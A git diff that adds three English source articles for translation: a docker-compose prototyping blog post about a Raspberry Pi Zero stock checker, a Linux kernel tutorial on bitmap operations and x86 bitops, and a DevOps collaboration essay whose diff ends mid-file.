diff --git a/sources/tech/20160512 Rapid prototyping with docker-compose.md b/sources/tech/20160512 Rapid prototyping with docker-compose.md
new file mode 100644
index 0000000000..0c67223697
--- /dev/null
+++ b/sources/tech/20160512 Rapid prototyping with docker-compose.md
@@ -0,0 +1,142 @@
+
+Rapid prototyping with docker-compose
+========================================
+
+In this write-up we'll look at a Node.js prototype for **finding stock of the Raspberry PI Zero** from three major outlets in the UK.
+
+I wrote the code and deployed it to an Ubuntu VM in Azure within a single evening of hacking. Docker and the docker-compose tool made the deployment and update process extremely quick.
+
+### Remember linking?
+
+If you've already been through the [Hands-On Docker tutorial][1] then you will have experience linking Docker containers on the command line. Linking a Node hit counter to a Redis server on the command line may look like this:
+
+```
+$ docker run -d -P --name redis1
+$ docker run -d hit_counter -p 3000:3000 --link redis1:redis
+```
+
+Now imagine your application has three tiers
+
+- Web front-end
+- Batch tier for processing long running tasks
+- Redis or mongo database
+
+Explicit linking through `--link` is just about manageable with a couple of containers, but can get out of hand as we add more tiers or containers to the application.
+
+### Enter docker-compose
+
+![](http://blog.alexellis.io/content/images/2016/05/docker-compose-logo-01.png)
+>Docker Compose logo
+
+The docker-compose tool is part of the standard Docker Toolbox and can also be downloaded separately. It provides a rich set of features to configure all of an application's parts through a plain-text YAML file.
+
+The above example would look like this:
+
+```
+version: "2.0"
+services:
+ redis1:
+ image: redis
+ hit_counter:
+ build: ./hit_counter
+ ports:
+ - 3000:3000
+```
+
+From Docker 1.10 onwards we can take advantage of network overlays to help us scale out across multiple hosts. Prior to this linking only worked across a single host. The `docker-compose scale` command can be used to bring on more computing power as the need arises.
+
+>View the [docker-compose][2] reference on docker.com
+
+### Real-world example: Raspberry PI Stock Alert
+
+![](http://blog.alexellis.io/content/images/2016/05/Raspberry_Pi_Zero_ver_1-3_1_of_3_large.JPG)
+>The new Raspberry PI Zero v1.3 image courtesy of Pimoroni
+
+There is a huge buzz around the Raspberry PI Zero - a tiny microcomputer with a 1GHz CPU and 512MB RAM capable of running full Linux, Docker, Node.js, Ruby and many other popular open-source tools. One of the best things about the PI Zero is that costs only 5 USD. That also means that stock gets snapped up really quickly.
+
+*If you want to try Docker or Swarm on the PI check out the tutorial below.*
+
+>[Docker Swarm on the PI Zero][3]
+
+### Original site: whereismypizero.com
+
+I found a webpage which used screen scraping to find whether 4-5 of the most popular outlets had stock.
+
+- The site contained a static HTML page
+- Issued one XMLHttpRequest per outlet accessing /public/api/
+- The server issued the HTTP request to each shop and performed the scraping
+
+Every call to /public/api/ took 3 seconds to execute and using Apache Bench (ab) I was only able to get through 0.25 requests per second.
+
+### Reinventing the wheel
+
+The retailers didn't seem to mind whereismypizero.com scraping their sites for stock, so I set about writing a similar tool from the ground up. I had the intention of handing a much higher amount of requests per second through caching and de-coupling the scrape from the web tier. Redis was the perfect tool for the job. It allowed me to set an automatically expiring key/value pair (i.e. a simple cache) and also to transmit messages between Node processes through pub/sub.
+
+>Fork or star the code on Github: [alexellis/pi_zero_stock][4]
+
+If you've worked with Node.js before then you will know it is single-threaded and that any CPU intensive tasks such as parsing HTML or JSON could lead to a slow-down. One way to mitigate that is to use a second worker process and a Redis messaging channel as connective tissue between this and the web tier.
+
+- Web tier
+ -Gives 200 for cache hit (Redis key exists for store)
+ -Gives 202 for cache miss (Redis key doesn't exist, so issues message)
+ -Since we are only ever reading a Redis key the response time is very quick.
+- Stock Fetcher
+ -Performs HTTP request
+ -Scrapes for different types of web stores
+ -Updates a Redis key with a cache expire of 60 seconds
+ -Also locks a Redis key to prevent too many in-flight HTTP requests to the web stores.
+```
+version: "2.0"
+services:
+ web:
+ build: ./web/
+ ports:
+ - "3000:3000"
+ stock_fetch:
+ build: ./stock_fetch/
+ redis:
+ image: redis
+```
+
+*The docker-compose.yml file from the example.*
+
+Once I had this working locally deploying to an Ubuntu 16.04 image in the cloud (Azure) took less than 5 minutes. I logged in, cloned the repository and typed in `docker compose up -d`. That was all it took - rapid prototyping a whole system doesn't get much better. Anyone (including the owner of whereismypizero.com) can deploy the new solution with just two lines:
+
+```
+$ git clone https://github.com/alexellis/pi_zero_stock
+$ docker-compose up -d
+```
+
+Updating the site is easy and just involves a `git pull` followed by a `docker-compose up -d` with the `--build` argument passed along.
+
+If you are still linking your Docker containers manually, try Docker Compose for yourself or my code below:
+
+>Fork or star the code on Github: [alexellis/pi_zero_stock][5]
+
+### Check out the test site
+
+The test site is currently deployed now using docker-compose.
+
+>[stockalert.alexellis.io][6]
+
+![](http://blog.alexellis.io/content/images/2016/05/Screen-Shot-2016-05-16-at-22-34-26-1.png)
+
+Preview as of 16th of May 2016
+
+----------
+via: http://blog.alexellis.io/rapid-prototype-docker-compose/
+
+作者:[Alex Ellis][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://blog.alexellis.io/author/alex/
+[1]: http://blog.alexellis.io/handsondocker
+[2]: https://docs.docker.com/compose/compose-file/
+[3]: http://blog.alexellis.io/dockerswarm-pizero/
+[4]: https://github.com/alexellis/pi_zero_stock
+[5]: https://github.com/alexellis/pi_zero_stock
+[6]: http://stockalert.alexellis.io/
+
diff --git a/sources/tech/20160512 Bitmap in Linux Kernel.md b/sources/tech/20160512 Bitmap in Linux Kernel.md
new file mode 100644
index 0000000000..06297fa204
--- /dev/null
+++ b/sources/tech/20160512 Bitmap in Linux Kernel.md
@@ -0,0 +1,398 @@
+[Translating By cposture 20160520]
+Data Structures in the Linux Kernel
+================================================================================
+
+Bit arrays and bit operations in the Linux kernel
+--------------------------------------------------------------------------------
+
+Besides different [linked](https://en.wikipedia.org/wiki/Linked_data_structure) and [tree](https://en.wikipedia.org/wiki/Tree_%28data_structure%29) based data structures, the Linux kernel provides [API](https://en.wikipedia.org/wiki/Application_programming_interface) for [bit arrays](https://en.wikipedia.org/wiki/Bit_array) or `bitmap`. Bit arrays are heavily used in the Linux kernel and following source code files contain common `API` for work with such structures:
+
+* [lib/bitmap.c](https://github.com/torvalds/linux/blob/master/lib/bitmap.c)
+* [include/linux/bitmap.h](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h)
+
+Besides these two files, there is also architecture-specific header file which provides optimized bit operations for certain architecture. We consider [x86_64](https://en.wikipedia.org/wiki/X86-64) architecture, so in our case it will be:
+
+* [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h)
+
+header file. As I just wrote above, the `bitmap` is heavily used in the Linux kernel. For example a `bit array` is used to store set of online/offline processors for systems which support [hot-plug](https://www.kernel.org/doc/Documentation/cpu-hotplug.txt) cpu (more about this you can read in the [cpumasks](https://0xax.gitbooks.io/linux-insides/content/Concepts/cpumask.html) part), a `bit array` stores set of allocated [irqs](https://en.wikipedia.org/wiki/Interrupt_request_%28PC_architecture%29) during initialization of the Linux kernel and etc.
+
+So, the main goal of this part is to see how `bit arrays` are implemented in the Linux kernel. Let's start.
+
+Declaration of bit array
+================================================================================
+
+Before we will look on `API` for bitmaps manipulation, we must know how to declare it in the Linux kernel. There are two common method to declare own bit array. The first simple way to declare a bit array is to array of `unsigned long`. For example:
+
+```C
+unsigned long my_bitmap[8]
+```
+
+The second way is to use the `DECLARE_BITMAP` macro which is defined in the [include/linux/types.h](https://github.com/torvalds/linux/blob/master/include/linux/types.h) header file:
+
+```C
+#define DECLARE_BITMAP(name,bits) \
+ unsigned long name[BITS_TO_LONGS(bits)]
+```
+
+We can see that `DECLARE_BITMAP` macro takes two parameters:
+
+* `name` - name of bitmap;
+* `bits` - amount of bits in bitmap;
+
+and just expands to the definition of `unsigned long` array with `BITS_TO_LONGS(bits)` elements, where the `BITS_TO_LONGS` macro converts a given number of bits to number of `longs` or in other words it calculates how many `8` byte elements in `bits`:
+
+```C
+#define BITS_PER_BYTE 8
+#define DIV_ROUND_UP(n,d) (((n) + (d) - 1) / (d))
+#define BITS_TO_LONGS(nr) DIV_ROUND_UP(nr, BITS_PER_BYTE * sizeof(long))
+```
+
+So, for example `DECLARE_BITMAP(my_bitmap, 64)` will produce:
+
+```python
+>>> (((64) + (64) - 1) / (64))
+1
+```
+
+and:
+
+```C
+unsigned long my_bitmap[1];
+```
+
+After we are able to declare a bit array, we can start to use it.
+
+Architecture-specific bit operations
+================================================================================
+
+We already saw above a couple of source code and header files which provide [API](https://en.wikipedia.org/wiki/Application_programming_interface) for manipulation of bit arrays. The most important and widely used API of bit arrays is architecture-specific and located as we already know in the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file.
+
+First of all let's look at the two most important functions:
+
+* `set_bit`;
+* `clear_bit`.
+
+I think that there is no need to explain what these function do. This is already must be clear from their name. Let's look on their implementation. If you will look into the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file, you will note that each of these functions represented by two variants: [atomic](https://en.wikipedia.org/wiki/Linearizability) and not. Before we will start to dive into implementations of these functions, first of all we must to know a little about `atomic` operations.
+
+In simple words atomic operations guarantees that two or more operations will not be performed on the same data concurrently. The `x86` architecture provides a set of atomic instructions, for example [xchg](http://x86.renejeschke.de/html/file_module_x86_id_328.html) instruction, [cmpxchg](http://x86.renejeschke.de/html/file_module_x86_id_41.html) instruction and etc. Besides atomic instructions, some of non-atomic instructions can be made atomic with the help of the [lock](http://x86.renejeschke.de/html/file_module_x86_id_159.html) instruction. It is enough to know about atomic operations for now, so we can begin to consider implementation of `set_bit` and `clear_bit` functions.
+
+First of all, let's start to consider `non-atomic` variants of this function. Names of non-atomic `set_bit` and `clear_bit` starts from double underscore. As we already know, all of these functions are defined in the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file and the first function is `__set_bit`:
+
+```C
+static inline void __set_bit(long nr, volatile unsigned long *addr)
+{
+ asm volatile("bts %1,%0" : ADDR : "Ir" (nr) : "memory");
+}
+```
+
+As we can see it takes two arguments:
+
+* `nr` - number of bit in a bit array.
+* `addr` - address of a bit array where we need to set bit.
+
+Note that the `addr` parameter is defined with `volatile` keyword which tells to compiler that value maybe changed by the given address. The implementation of the `__set_bit` is pretty easy. As we can see, it just contains one line of [inline assembler](https://en.wikipedia.org/wiki/Inline_assembler) code. In our case we are using the [bts](http://x86.renejeschke.de/html/file_module_x86_id_25.html) instruction which selects a bit which is specified with the first operand (`nr` in our case) from the bit array, stores the value of the selected bit in the [CF](https://en.wikipedia.org/wiki/FLAGS_register) flags register and set this bit.
+
+Note that we can see usage of the `nr`, but there is `addr` here. You already might guess that the secret is in `ADDR`. The `ADDR` is the macro which is defined in the same header code file and expands to the string which contains value of the given address and `+m` constraint:
+
+```C
+#define ADDR BITOP_ADDR(addr)
+#define BITOP_ADDR(x) "+m" (*(volatile long *) (x))
+```
+
+Besides the `+m`, we can see other constraints in the `__set_bit` function. Let's look on they and try to understand what do they mean:
+
+* `+m` - represents memory operand where `+` tells that the given operand will be input and output operand;
+* `I` - represents integer constant;
+* `r` - represents register operand
+
+Besides these constraint, we also can see - the `memory` keyword which tells compiler that this code will change value in memory. That's all. Now let's look at the same function but at `atomic` variant. It looks more complex that its `non-atomic` variant:
+
+```C
+static __always_inline void
+set_bit(long nr, volatile unsigned long *addr)
+{
+ if (IS_IMMEDIATE(nr)) {
+ asm volatile(LOCK_PREFIX "orb %1,%0"
+ : CONST_MASK_ADDR(nr, addr)
+ : "iq" ((u8)CONST_MASK(nr))
+ : "memory");
+ } else {
+ asm volatile(LOCK_PREFIX "bts %1,%0"
+ : BITOP_ADDR(addr) : "Ir" (nr) : "memory");
+ }
+}
+```
+
+First of all note that this function takes the same set of parameters that `__set_bit`, but additionally marked with the `__always_inline` attribute. The `__always_inline` is macro which defined in the [include/linux/compiler-gcc.h](https://github.com/torvalds/linux/blob/master/include/linux/compiler-gcc.h) and just expands to the `always_inline` attribute:
+
+```C
+#define __always_inline inline __attribute__((always_inline))
+```
+
+which means that this function will be always inlined to reduce size of the Linux kernel image. Now let's try to understand implementation of the `set_bit` function. First of all we check a given number of bit at the beginning of the `set_bit` function. The `IS_IMMEDIATE` macro defined in the same [header](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) file and expands to the call of the builtin [gcc](https://en.wikipedia.org/wiki/GNU_Compiler_Collection) function:
+
+```C
+#define IS_IMMEDIATE(nr) (__builtin_constant_p(nr))
+```
+
+The `__builtin_constant_p` builtin function returns `1` if the given parameter is known to be constant at compile-time and returns `0` in other case. We no need to use slow `bts` instruction to set bit if the given number of bit is known in compile time constant. We can just apply [bitwise or](https://en.wikipedia.org/wiki/Bitwise_operation#OR) for byte from the give address which contains given bit and masked number of bits where high bit is `1` and other is zero. In other case if the given number of bit is not known constant at compile-time, we do the same as we did in the `__set_bit` function. The `CONST_MASK_ADDR` macro:
+
+```C
+#define CONST_MASK_ADDR(nr, addr) BITOP_ADDR((void *)(addr) + ((nr)>>3))
+```
+
+expands to the give address with offset to the byte which contains a given bit. For example we have address `0x1000` and the number of bit is `0x9`. So, as `0x9` is `one byte + one bit` our address with be `addr + 1`:
+
+```python
+>>> hex(0x1000 + (0x9 >> 3))
+'0x1001'
+```
+
+The `CONST_MASK` macro represents our given number of bit as byte where high bit is `1` and other bits are `0`:
+
+```C
+#define CONST_MASK(nr) (1 << ((nr) & 7))
+```
+
+```python
+>>> bin(1 << (0x9 & 7))
+'0b10'
+```
+
+In the end we just apply bitwise `or` for these values. So, for example if our address will be `0x4097` and we need to set `0x9` bit:
+
+```python
+>>> bin(0x4097)
+'0b100000010010111'
+>>> bin((0x4097 >> 0x9) | (1 << (0x9 & 7)))
+'0b100010'
+```
+
+the `ninth` bit will be set.
+
+Note that all of these operations are marked with `LOCK_PREFIX` which is expands to the [lock](http://x86.renejeschke.de/html/file_module_x86_id_159.html) instruction which guarantees atomicity of this operation.
+
+As we already know, besides the `set_bit` and `__set_bit` operations, the Linux kernel provides two inverse functions to clear bit in atomic and non-atomic context. They are `clear_bit` and `__clear_bit`. Both of these functions are defined in the same [header file](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) and takes the same set of arguments. But not only arguments are similar. Generally these functions are very similar on the `set_bit` and `__set_bit`. Let's look on the implementation of the non-atomic `__clear_bit` function:
+
+```C
+static inline void __clear_bit(long nr, volatile unsigned long *addr)
+{
+ asm volatile("btr %1,%0" : ADDR : "Ir" (nr));
+}
+```
+
+Yes. As we see, it takes the same set of arguments and contains very similar block of inline assembler. It just uses the [btr](http://x86.renejeschke.de/html/file_module_x86_id_24.html) instruction instead of `bts`. As we can understand form the function's name, it clears a given bit by the given address. The `btr` instruction acts like `btr`. This instruction also selects a given bit which is specified in the first operand, stores its value in the `CF` flag register and clears this bit in the given bit array which is specifed with second operand.
+
+The atomic variant of the `__clear_bit` is `clear_bit`:
+
+```C
+static __always_inline void
+clear_bit(long nr, volatile unsigned long *addr)
+{
+ if (IS_IMMEDIATE(nr)) {
+ asm volatile(LOCK_PREFIX "andb %1,%0"
+ : CONST_MASK_ADDR(nr, addr)
+ : "iq" ((u8)~CONST_MASK(nr)));
+ } else {
+ asm volatile(LOCK_PREFIX "btr %1,%0"
+ : BITOP_ADDR(addr)
+ : "Ir" (nr));
+ }
+}
+```
+
+and as we can see it is very similar on `set_bit` and just contains two differences. The first difference it uses `btr` instruction to clear bit when the `set_bit` uses `bts` instruction to set bit. The second difference it uses negated mask and `and` instruction to clear bit in the given byte when the `set_bit` uses `or` instruction.
+
+That's all. Now we can set and clear bit in any bit array and and we can go to other operations on bitmasks.
+
+Most widely used operations on a bit arrays are set and clear bit in a bit array in the Linux kernel. But besides this operations it is useful to do additional operations on a bit array. Yet another widely used operation in the Linux kernel - is to know is a given bit set or not in a bit array. We can achieve this with the help of the `test_bit` macro. This macro is defined in the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file and expands to the call of the `constant_test_bit` or `variable_test_bit` depends on bit number:
+
+```C
+#define test_bit(nr, addr) \
+ (__builtin_constant_p((nr)) \
+ ? constant_test_bit((nr), (addr)) \
+ : variable_test_bit((nr), (addr)))
+```
+
+So, if the `nr` is known in compile time constant, the `test_bit` will be expanded to the call of the `constant_test_bit` function or `variable_test_bit` in other case. Now let's look at implementations of these functions. Let's start from the `variable_test_bit`:
+
+```C
+static inline int variable_test_bit(long nr, volatile const unsigned long *addr)
+{
+ int oldbit;
+
+ asm volatile("bt %2,%1\n\t"
+ "sbb %0,%0"
+ : "=r" (oldbit)
+ : "m" (*(unsigned long *)addr), "Ir" (nr));
+
+ return oldbit;
+}
+```
+
+The `variable_test_bit` function takes similar set of arguments as `set_bit` and other function take. We also may see inline assembly code here which executes [bt](http://x86.renejeschke.de/html/file_module_x86_id_22.html) and [sbb](http://x86.renejeschke.de/html/file_module_x86_id_286.html) instruction. The `bt` or `bit test` instruction selects a given bit which is specified with first operand from the bit array which is specified with the second operand and stores its value in the [CF](https://en.wikipedia.org/wiki/FLAGS_register) bit of flags register. The second `sbb` instruction substracts first operand from second and subscrtact value of the `CF`. So, here write a value of a given bit number from a given bit array to the `CF` bit of flags register and execute `sbb` instruction which calculates: `00000000 - CF` and writes the result to the `oldbit`.
+
+The `constant_test_bit` function does the same as we saw in the `set_bit`:
+
+```C
+static __always_inline int constant_test_bit(long nr, const volatile unsigned long *addr)
+{
+ return ((1UL << (nr & (BITS_PER_LONG-1))) &
+ (addr[nr >> _BITOPS_LONG_SHIFT])) != 0;
+}
+```
+
+It generates a byte where high bit is `1` and other bits are `0` (as we saw in `CONST_MASK`) and applies bitwise [and](https://en.wikipedia.org/wiki/Bitwise_operation#AND) to the byte which contains a given bit number.
+
+The next widely used bit array related operation is to change bit in a bit array. The Linux kernel provides two helper for this:
+
+* `__change_bit`;
+* `change_bit`.
+
+As you already can guess, these two variants are atomic and non-atomic as for example `set_bit` and `__set_bit`. For the start, let's look at the implementation of the `__change_bit` function:
+
+```C
+static inline void __change_bit(long nr, volatile unsigned long *addr)
+{
+ asm volatile("btc %1,%0" : ADDR : "Ir" (nr));
+}
+```
+
+Pretty easy, is not it? The implementation of the `__change_bit` is the same as `__set_bit`, but instead of `bts` instruction, we are using [btc](http://x86.renejeschke.de/html/file_module_x86_id_23.html). This instruction selects a given bit from a given bit array, stores its value in the `CF` and changes its value by the applying of complement operation. So, a bit with value `1` will be `0` and vice versa:
+
+```python
+>>> int(not 1)
+0
+>>> int(not 0)
+1
+```
+
+The atomic version of the `__change_bit` is the `change_bit` function:
+
+```C
+static inline void change_bit(long nr, volatile unsigned long *addr)
+{
+ if (IS_IMMEDIATE(nr)) {
+ asm volatile(LOCK_PREFIX "xorb %1,%0"
+ : CONST_MASK_ADDR(nr, addr)
+ : "iq" ((u8)CONST_MASK(nr)));
+ } else {
+ asm volatile(LOCK_PREFIX "btc %1,%0"
+ : BITOP_ADDR(addr)
+ : "Ir" (nr));
+ }
+}
+```
+
+It is similar on `set_bit` function, but also has two differences. The first difference is `xor` operation instead of `or` and the second is `bts` instead of `bts`.
+
+For this moment we know the most important architecture-specific operations with bit arrays. Time to look at generic bitmap API.
+
+Common bit operations
+================================================================================
+
+Besides the architecture-specific API from the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file, the Linux kernel provides common API for manipulation of bit arrays. As we know from the beginning of this part, we can find it in the [include/linux/bitmap.h](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) header file and additionally in the * [lib/bitmap.c](https://github.com/torvalds/linux/blob/master/lib/bitmap.c) source code file. But before these source code files let's look into the [include/linux/bitops.h](https://github.com/torvalds/linux/blob/master/include/linux/bitops.h) header file which provides a set of useful macro. Let's look on some of they.
+
+First of all let's look at following four macros:
+
+* `for_each_set_bit`
+* `for_each_set_bit_from`
+* `for_each_clear_bit`
+* `for_each_clear_bit_from`
+
+All of these macros provide iterator over certain set of bits in a bit array. The first macro iterates over bits which are set, the second does the same, but starts from a certain bits. The last two macros do the same, but iterates over clear bits. Let's look on implementation of the `for_each_set_bit` macro:
+
+```C
+#define for_each_set_bit(bit, addr, size) \
+ for ((bit) = find_first_bit((addr), (size)); \
+ (bit) < (size); \
+ (bit) = find_next_bit((addr), (size), (bit) + 1))
+```
+
+As we may see it takes three arguments and expands to the loop from first set bit which is returned as result of the `find_first_bit` function and to the last bit number while it is less than given size.
+
+Besides these four macros, the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) provides API for rotation of `64-bit` or `32-bit` values and etc.
+
+The next [header](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) file which provides API for manipulation with a bit arrays. For example it provdes two functions:
+
+* `bitmap_zero`;
+* `bitmap_fill`.
+
+To clear a bit array and fill it with `1`. Let's look on the implementation of the `bitmap_zero` function:
+
+```C
+static inline void bitmap_zero(unsigned long *dst, unsigned int nbits)
+{
+ if (small_const_nbits(nbits))
+ *dst = 0UL;
+ else {
+ unsigned int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
+ memset(dst, 0, len);
+ }
+}
+```
+
+First of all we can see the check for `nbits`. The `small_const_nbits` is macro which defined in the same header [file](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) and looks:
+
+```C
+#define small_const_nbits(nbits) \
+ (__builtin_constant_p(nbits) && (nbits) <= BITS_PER_LONG)
+```
+
+As we may see it checks that `nbits` is known constant in compile time and `nbits` value does not overflow `BITS_PER_LONG` or `64`. If bits number does not overflow amount of bits in a `long` value we can just set to zero. In other case we need to calculate how many `long` values do we need to fill our bit array and fill it with [memset](http://man7.org/linux/man-pages/man3/memset.3.html).
+
+The implementation of the `bitmap_fill` function is similar on implementation of the `biramp_zero` function, except we fill a given bit array with `0xff` values or `0b11111111`:
+
+```C
+static inline void bitmap_fill(unsigned long *dst, unsigned int nbits)
+{
+ unsigned int nlongs = BITS_TO_LONGS(nbits);
+ if (!small_const_nbits(nbits)) {
+ unsigned int len = (nlongs - 1) * sizeof(unsigned long);
+ memset(dst, 0xff, len);
+ }
+ dst[nlongs - 1] = BITMAP_LAST_WORD_MASK(nbits);
+}
+```
+
+Besides the `bitmap_fill` and `bitmap_zero` functions, the [include/linux/bitmap.h](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) header file provides `bitmap_copy` which is similar on the `bitmap_zero`, but just uses [memcpy](http://man7.org/linux/man-pages/man3/memcpy.3.html) instead of [memset](http://man7.org/linux/man-pages/man3/memset.3.html). Also it provides bitwise operations for bit array like `bitmap_and`, `bitmap_or`, `bitamp_xor` and etc. We will not consider implementation of these functions because it is easy to understand implementations of these functions if you understood all from this part. Anyway if you are interested how did these function implemented, you may open [include/linux/bitmap.h](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) header file and start to research.
+
+That's all.
+
+Links
+================================================================================
+
+* [bitmap](https://en.wikipedia.org/wiki/Bit_array)
+* [linked data structures](https://en.wikipedia.org/wiki/Linked_data_structure)
+* [tree data structures](https://en.wikipedia.org/wiki/Tree_%28data_structure%29)
+* [hot-plug](https://www.kernel.org/doc/Documentation/cpu-hotplug.txt)
+* [cpumasks](https://0xax.gitbooks.io/linux-insides/content/Concepts/cpumask.html)
+* [IRQs](https://en.wikipedia.org/wiki/Interrupt_request_%28PC_architecture%29)
+* [API](https://en.wikipedia.org/wiki/Application_programming_interface)
+* [atomic operations](https://en.wikipedia.org/wiki/Linearizability)
+* [xchg instruction](http://x86.renejeschke.de/html/file_module_x86_id_328.html)
+* [cmpxchg instruction](http://x86.renejeschke.de/html/file_module_x86_id_41.html)
+* [lock instruction](http://x86.renejeschke.de/html/file_module_x86_id_159.html)
+* [bts instruction](http://x86.renejeschke.de/html/file_module_x86_id_25.html)
+* [btr instruction](http://x86.renejeschke.de/html/file_module_x86_id_24.html)
+* [bt instruction](http://x86.renejeschke.de/html/file_module_x86_id_22.html)
+* [sbb instruction](http://x86.renejeschke.de/html/file_module_x86_id_286.html)
+* [btc instruction](http://x86.renejeschke.de/html/file_module_x86_id_23.html)
+* [man memcpy](http://man7.org/linux/man-pages/man3/memcpy.3.html)
+* [man memset](http://man7.org/linux/man-pages/man3/memset.3.html)
+* [CF](https://en.wikipedia.org/wiki/FLAGS_register)
+* [inline assembler](https://en.wikipedia.org/wiki/Inline_assembler)
+* [gcc](https://en.wikipedia.org/wiki/GNU_Compiler_Collection)
+
+
+------------------------------------------------------------------------------
+
+via: https://github.com/0xAX/linux-insides/blob/master/DataStructures/bitmap.md
+
+作者:[0xAX][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://twitter.com/0xAX
diff --git a/sources/tech/20160516 Scaling Collaboration in DevOps.md b/sources/tech/20160516 Scaling Collaboration in DevOps.md
new file mode 100644
index 0000000000..bee9ab5415
--- /dev/null
+++ b/sources/tech/20160516 Scaling Collaboration in DevOps.md
@@ -0,0 +1,68 @@
+Translating by Bestony
+Scaling Collaboration in DevOps
+=================================
+
+![](http://devops.com/wp-content/uploads/2016/05/ScalingCollaboration.jpg)
+
+Those familiar with DevOps generally agree that it is equally as much about culture as it is about technology. There are certainly tools and practices involved in the effective implementation of DevOps, but the foundation of DevOps success is how well [teams and individuals collaborate][1] across the enterprise to get things done more rapidly, efficiently and effectively.
+
+Most DevOps platforms and tools are designed with scalability in mind. DevOps environments often run in the cloud and tend to be volatile. It’s important for the software that supports DevOps to be able to scale in real time to address spikes and lulls in demand. The same thing is true for the human element as well, but scaling collaboration is a whole different story.
+
+Collaboration across the enterprise is critical for DevOps success. Great code and development needs to make it over the finish line to production to benefit customers. The challenge organizations face is how to do that seamlessly and with as much speed and automation as possible without sacrificing quality or performance. How can businesses streamline code development and deployment, while maintaining visibility, governance and compliance?
+
+### Emerging Trends
+
+First, I want to provide some background and share some data gathered by 451 Research on DevOps and DevOps adoption in general. Cloud, agile and DevOps capabilities are important for organizations today—both in perception and reality. 451 sees enterprise adoption of these things, as well as container technologies, growing—including increased usage in production environments.
+
+There are a number of advantages to embracing these technologies and methodologies, such as increased flexibility and speed, reduction of costs, improvements in resilience and reliability, and fitness for new or emerging applications. According to 451 Research, organizations also face some barriers including a lack of familiarity and required skills internally, the immaturity of these emerging technologies, and cost and security concerns.
+
+In the “[Voice of the Enterprise: SDI Q4 2015 survey][2],” 451 Research found that more than half of the respondents (51.7 percent) consider themselves to be late adopters, or even the last adopters of new technology. The flip side of that is that almost half (48.3 percent) label themselves as first or early adopters.
+
+Those general sentiments are reflected in the survey responses to other questions. When asked about implementation of containers, 50.3 percent stated it is not in their plans at all, while the remaining 49.7 percent are in some state of planning, pilot or active use of container technologies. Nearly two-thirds (65.1 percent) indicated that they use agile development methodologies for application development, but only 39.6 percent responded that they’ve embraced DevOps approaches. Nevertheless, while agile software development has been in the industry for years, 451 notes the impressive adoption of containers and DevOps, given they are emergent trends.
+
+When asked what the top three IT pain points are, the leading responses were cost or budget, insufficient staff and legacy software issues. As organizations move to cloud, DevOps, and containers issues such as these will need to be addressed, along with how to scale both technologies and collaboration effectively.
+
+### The Current State
+
+The industry—driven in large part by the DevOps revolution—is in the midst of a sea change, where software development is becoming more highly integrated across the entire business. The creation of software is less segregated and is more and more a function of collaboration and socialization.
+
+Concepts and methodologies that were novel or niche just a few years ago have matured quickly to become the mainstream technologies and frameworks that are driving value today. Businesses rely on concepts such as agile, lean, virtualization, cloud, automation and microservices to streamline development and enable them to work more effectively and efficiently at the same time.
+
+To adapt and evolve, enterprises need to accomplish a number of key tasks. The challenge companies face today is how to accelerate development while reducing costs. Organizations need to eliminate the barriers that exist between IT and the rest of the business, and work cooperatively toward a strategy that provides more effectiveness in a technology-driven, competitive environment.
+
+Agile, cloud, DevOps and containers all play a role in that process, but the one thing that binds it all is effective collaboration. Each of these technologies and methodologies provides unique benefits, but the real value comes from the organization as a whole—and the tools and platforms used by the organization—being able to collaborate at scale. Successful DevOps implementations also require participation from other stakeholders beyond development and IT operations teams, including security, database, storage and line-of-business teams.
+
+### Collaboration-as-a-Platform
+
+There are services and platforms online—such as GitHub—that facilitate and streamline collaboration. The online platform functions as a code repository, but the value extends beyond just providing a place to store code.
+
+Such a [collaboration platform][4] helps developers and teams collaborate more effectively because it provides a community where the code and process can be shared and discussed. Managers can monitor progress and track what code is shipping next. Developers can experiment with new ideas in a safe environment before taking those experiments to a live production environment, and new ideas and experiments can be effectively communicated to the appropriate teams.
+
+One of the keys to more agile development and DevOps is to allow developers to test things and gather relevant feedback quickly. The goal is to produce quality code and features faster, not to waste time setting up and managing infrastructure or scheduling more meetings to talk about it. The GitHub platform, for example, enables more effective and scalable collaboration because code review can occur when it is most convenient for the participants. There is no need to try and coordinate and schedule code review meetings, so the developers can continue to work uninterrupted, resulting in greater productivity and job satisfaction.
+
+Steven Anderson of Sendachi noted that GitHub is a collaboration platform, but it’s also a place for your tools to work with you, too. This means it can help not only with collaboration and continuous integration, but also with code quality.
+
+One of the benefits of a collaboration platform is that large teams of developers can be broken down into smaller teams that can focus more efficiently on specific components. It also allows things such as document sharing alongside code development to blur the lines between technical and non-technical contributions and enable increased collaboration and visibility.
+
+### Collaboration is Key
+
+The importance of collaboration can’t be stressed enough. It is a key tenet of DevOps culture, and it’s vital to agile development and maintaining a competitive edge in today’s world. Executive or management support and internal evangelism are important. Organizations also need to embrace the culture shift—blending skills across functional areas toward a common goal.
+
